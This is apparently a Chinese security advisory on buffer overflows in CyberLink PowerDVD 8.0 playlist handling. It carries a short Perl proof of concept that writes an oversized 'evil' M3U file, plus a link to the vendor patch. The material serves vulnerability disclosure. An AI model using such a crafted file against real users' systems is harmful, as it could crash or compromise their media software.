发布日期：2008-07-22
更新日期：2008-07-22

受影响系统：

PowerDVD PowerDVD 8.0

描述：

---

BUGTRAQ  ID: 30341

PowerDVD是台湾讯连科技所开发的高品质的影音光碟播放程序。

PowerDVD 8.0及之前版本在处理特制的PLS/M3U播放列表时存在多个缓冲区溢出漏洞，成功利用后可使远程攻击者在受影响应用上下文中执行任意代码。

<*来源：Gjoko 'LiquidWorm' Krstic
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
#
# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
# Coded by Gjoko "LiquidWorm" Krstic
# liquidworm [At] gmail.com
# http://www.zeroscience.org
#

$buffer = "J" x 520000;

open(m3u, ">./evil_list.m3u"); # or .pls

print m3u "$buffer";

print "\n--> Evil Playlist created... Have fun!\n";

# July, 2008

建议：

---

厂商补丁：

PowerDVD
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://cn.cyberlink.com/products/powerdvd-ultra/features_zh_CN.html?&r=1

浏览次数：1659
严重程度：0（网友投票）